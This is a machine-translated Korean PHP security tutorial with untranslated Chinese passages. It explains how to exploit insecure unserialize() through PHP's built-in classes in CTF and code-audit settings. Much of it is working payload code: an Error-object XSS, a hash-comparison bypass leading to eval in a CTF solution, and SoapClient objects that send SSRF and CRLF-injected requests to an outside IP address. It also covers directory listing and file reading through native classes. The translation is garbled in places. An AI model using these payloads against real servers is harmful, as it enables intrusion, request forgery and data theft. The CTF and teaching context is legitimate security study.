이 기사에서는 역직렬화된 네이티브 클래스의 사용을 주로 소개하는 PHP에 대한 관련 지식을 제공합니다. 코드 감사 또는 ctf에 역직렬화 기능이 있지만 구성할 수 없는 경우 완전한 팝 체인이 생성되면 어떻게 해야 합니까? 모두에게 도움이 되기를 바랍니다.
추천 학습: "PHP 비디오 튜토리얼"
PHP 역직렬화 네이티브 클래스 사용에 대한 간략한 분석
코드 감사 또는 ctf에 역직렬화 기능 지점이 있지만 구성할 수 없는 경우 완전 팝 체인, 이때 어떻게 상황을 깨뜨려야 할까요? PHP 네이티브 클래스로 시작해 볼 수 있습니다. 일부 PHP 네이티브 클래스에는 몇 가지 내장된 매직 메서드가 있습니다. 제어 가능한 매개 변수를 영리하게 구성하고 내장된 매직 메서드를 사용하면 원하는 목표 중 일부를 달성할 수 있습니다. .
1. 일반적인 매직 메소드
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把对象当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发
로그인 후 복사
2. 네이티브 클래스의 매직 메소드
다음 스크립트를 사용하여 모든 네이티브 클래스의 매직 메소드를 탐색합니다.
<?php $classes = get_declared_classes();foreach ($classes as $class) {
$methods = get_class_methods($class);
foreach ($methods as $method) {
if (in_array($method, array(
'__destruct',
'__toString',
'__wakeup',
'__call',
'__callStatic',
'__get',
'__set',
'__isset',
'__unset',
'__invoke',
'__set_state'
))) {
print $class . '::' . $method . "\n";
}
}}로그인 후 복사
3.
Error/Exception
Error은 모든 PHP 내부 오류 클래스의 기본 클래스입니다. (PHP 7, 8)
**Error::__toString ** error의 문자열 표현
Error의 문자열 표현을 반환합니다.
Exception은 모든 사용자 수준 예외의 기본 클래스입니다. (PHP 5, 7, 8)
**Exception::__toString ** 예외 객체를 문자열로 변환
문자열(string) 형식으로 변환된 예외를 반환합니다. ㅋㅋㅋ
XSS
__toString 메소드는 우리가 입력한 매개변수가 포함된 문자열 형식으로 오류나 예외를 반환합니다. xss 코드 문자열을 구성하고 이를 에코 렌더링과 결합하면 반영된 xss 취약점이 트리거됩니다
예:
<?php $a = unserialize($_GET['a']);echo $a;
로그인 후 복사
<?php $a = new Error("<script>alert('xss')");$b = serialize($a);echo urlencode($b);로그인 후 복사
먼저 질문을 살펴보겠습니다
[2020 Geek Challenge] Greatphp
<?phperror_reporting (0);class SYCLOVER {
public $syc;
public $lover;
public function __wakeup(){
if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
if(!preg_match("/\syc, $match)){
eval($this->syc);
} else {
die("Try Hard !!");
}
}
}}if (isset($_GET['great'])){
unserialize($_GET['great']);} else {
highlight_file(__FILE__);}로그인 후 복사
두 개의 해시 강력한 비교를 우회해야 하며 궁극적으로 다음에 대한 평가 코드를 생성해야 합니다. 실행
분명히 정상 메소드는 작동하지 않지만 네이티브 클래스를 통해 우회할 수 있습니다마찬가지로 md5() 및 sha1() 함수가 객체를 처리할 때 __tostring 메소드가 자동으로 호출됩니다
간단히 살펴보겠습니다 출력에서 먼저
<?php $a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo $b."<br>";
echo $c."<br>";
echo $d;로그인 후 복사
이 두 네이티브 클래스가 반환한 정보는 줄 번호를 제외하고 완전히 동일하다는 것을 알 수 있습니다. 이를 사용하면 해시 함수를 우회할 수 있습니다. 들어오는 두 개체는 같은 줄에 배치되어야 합니다
따라서 간단한 테스트를 수행할 수 있으며 이 방법을 사용하면 해시 강력한(약한) 함수 비교를 우회할 수 있음을 알 수 있습니다
<?php $a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
echo '$a不等于$b'."\n";}if (md5($a)===md5($b)){
echo "md5值相等\n";}if (sha1($a)===sha1($b)){
echo "sha1值相等";}로그인 후 복사
이러한 지식 포인트에 따르면 다음을 수행할 수 있습니다. 페이로드를 쉽게 구성하세요
<?phpclass SYCLOVER {
public $syc;
public $lover;
public function __wakeup(){
if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
if(!preg_match("/\syc, $match)){
eval($this->syc);
} else {
die("Try Hard !!");
}
}
}}$str = "?>=include~".urldecode("%D0%99%93%9E%98")."?>";//两次取反绕过正则$a=new Error($str,1);
$b=new Error($str,2);
$c = new SYCLOVER();$c->syc = $a;$c->lover = $b;
echo(urlencode(serialize($c)));?>로그인 후 복사
SoapClient
SoapClient
는 웹 서비스에 액세스하는 데 사용되는 클래스로 SOAP 프로토콜을 기반으로 웹 서비스에 액세스하는 PHP 클라이언트를 제공할 수 있으며, SOAP 데이터 메시지를 생성하고 wsdl 인터페이스와 상호 작용할 수 있습니다. Soap 확장 모듈은 기본적으로 닫혀 있으며 사용 시 수동으로 켜야 합니다. SoapClient::__call
— SOAP 함수 호출(PHP 5, 7, 8)
일반적으로 SOAP 함수는 다음과 같이 호출할 수 있습니다. SoapClient 개체
SSRF
생성자: 
public SoapClient :: SoapClient(mixed $wsdl [,array $options ])
第一个参数是用来指明是否是wsdl模式,如果为`null`,那就是非wsdl模式。
第二个参数为一个数组,如果在wsdl模式下,此参数可选;如果在非wsdl模式下,则必须设置location和uri选项,其中location是要将请求发送到的SOAP服务器的URL,而uri 是SOAP服务的目标命名空间。
로그인 후 복사
soap
SOAP 是基于 XML 的简易协议,是用在分散或分布的环境中交换信息的简单的协议,可使应用程序在 HTTP 之上进行信息交换
SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发,查询webService ,SOAP(简单对象访问协议)是连接或Web服务或客户端和Web服务之间的接口。
其采用HTTP作为底层通讯协议,XML作为数据传送的格式。
로그인 후 복사
us는 무엇입니까 익스플로잇 페이로드를 구성합니다. 첫 번째 매개변수는 NULL이고 두 번째 매개변수의 위치는 vps 주소
<?php $a = new SoapClient(null, array(
'location' => 'http://47.102.146.95:2333',
'uri' =>'uri',
'user_agent'=>'111111'));
$b = serialize($a);
echo $b;
$c = unserialize($b);
$c->a();
로그인 후 복사
로 설정됩니다. vps의 2333 포트를 청취하면 아래 그림과 같이 SSRF가 성공적으로 트리거됩니다. vps는 요청 정보
를 수신하여 SOAPAction과 user_agent를 모두 제어할 수 있습니다
이 내장 클래스(즉, 비누 프로토콜)를 사용하여 서비스가 있는 포트를 요청하면 오류가 즉시 보고되고 서비스가 존재하지 않는(비어 있는) 포트에 액세스하면 대기하는 것으로 나타났습니다. 오류를 보고하는 데 일정 시간이 소요되며 이를 사용하여 인트라넷 자산을 감지할 수 있습니다.
CRLF 취약점에 협력하면 다른 매개변수를 제어하거나 SoapClient를 통해 데이터를 보낼 수도 있습니다. 예: Redis를 공격하는 HTTP 프로토콜
CRLF 지식 확장
HTTP报文的结构:状态行和首部中的每行以CRLF结束,首部与主体之间由一空行分隔。
CRLF注入漏洞,是因为Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符。
攻击者一旦向请求行或首部中的字段注入恶意的CRLF(\r\n),就能注入一些首部字段或报文主体,并在响应中输出。
로그인 후 복사
CRLF를 결합하면 SoapClient+CRLF를 사용하여 맞춤 쿠키 삽입,
<?php $a = new SoapClient(null, array(
'location' => 'http://47.102.146.95:2333',
'uri' =>'uri',
'user_agent'=>"111111\r\nCookie: PHPSESSION=dasdasd564d6as4d6a"));
$b = serialize($a);echo $b;$c = unserialize($b);$c->a();로그인 후 복사
등 더 많은 작업을 수행할 수 있습니다.
发送POST的数据包,这里需要将Content-Type设置为application/x-www-form-urlencoded,我们可以通过添加两个\r\n来将原来的Content-Type挤下去,自定义一个新的Content-Type
<?php $a = new SoapClient(null, array(
'location' => 'http://47.102.146.95:2333',
'uri' =>'uri',
'user_agent'=>"111111\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Forwarded-For: 127.0.0.1\r\nCookie: PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length: 10\r\n\r\npostdata"));
$b = serialize($a);echo $b;$c = unserialize($b);$c->a();로그인 후 복사
看一道ctfshow上的题,完美利用上述知识点
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff); //获取xff头
if($ip!=='127.0.0.1'){
die('error');
}else{
$token = $_POST['token'];
if($token=='ctfshow'){
file_put_contents('flag.txt',$flag);
}
}로그인 후 복사
poc:
<?php $target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>로그인 후 복사
DirectoryIterator/FilesystemIterator
DirectoryIterator类提供了一个简单的接口来查看文件系统目录的内容。
DirectoryIterator::__toString 获取字符串形式的文件名 (PHP 5,7,8)
目录遍历
使用此内置类的__toString方法结合glob或file协议,即可实现目录遍历
例如:
<?php $a = new DirectoryIterator("glob:///*");
foreach ($a as $b){
echo $b.'<br>';
}로그인 후 복사
FilesystemIterator继承于DirectoryIterator,两者作用和用法基本相同,区别为FilesystemIterator会显示文件的完整路径,而DirectoryIterator只显示文件名
因为可以配合使用glob伪协议(查找匹配的文件路径模式),所以可以绕过open_basedir的限制
在php4.3以后使用了zend_class_unserialize_deny来禁止一些类的反序列化,很不幸的是这两个原生类都在禁止名单当中
SplFileObject
SplFileObject 类为单个文件的信息提供了一个面向对象的高级接口
(PHP 5 >= 5.1.2, PHP 7, PHP 8)
文件读取
SplFileObject::__toString — 以字符串形式返回文件的路径
<?phphighlight_file (__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
echo($a);
}*/로그인 후 복사
如果没有遍历的话只能读取第一行,且受到open_basedir影响
SimpleXMLElement
解析XML 文档中的元素。 (PHP 5、PHP 7、PHP 8)
SimpleXMLElement::__construct — 创建一个新的 SimpleXMLElement 对象
XXE
我们查看一下其参数:
根据官方文档,发现当第三个参数为True时,即可实现远程xml文件载入,第二个参数的常量值设置为2即可。
利用可参考赛题:[SUCTF 2018]Homework
ReflectionMethod
获取注释内容
(PHP 5 >= 5.1.0, PHP 7, PHP 8)
ReflectionFunctionAbstract::getDocComment — 获取注释内容
由该原生类中的getDocComment方法可以访问到注释的内容
同时可利用的原生类还有ZipArchive– 删除文件等等,不在叙述
推荐学习:《PHP视频教程》
위 내용은 PHP 역직렬화 네이티브 클래스에 대한 심층적인 이해의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
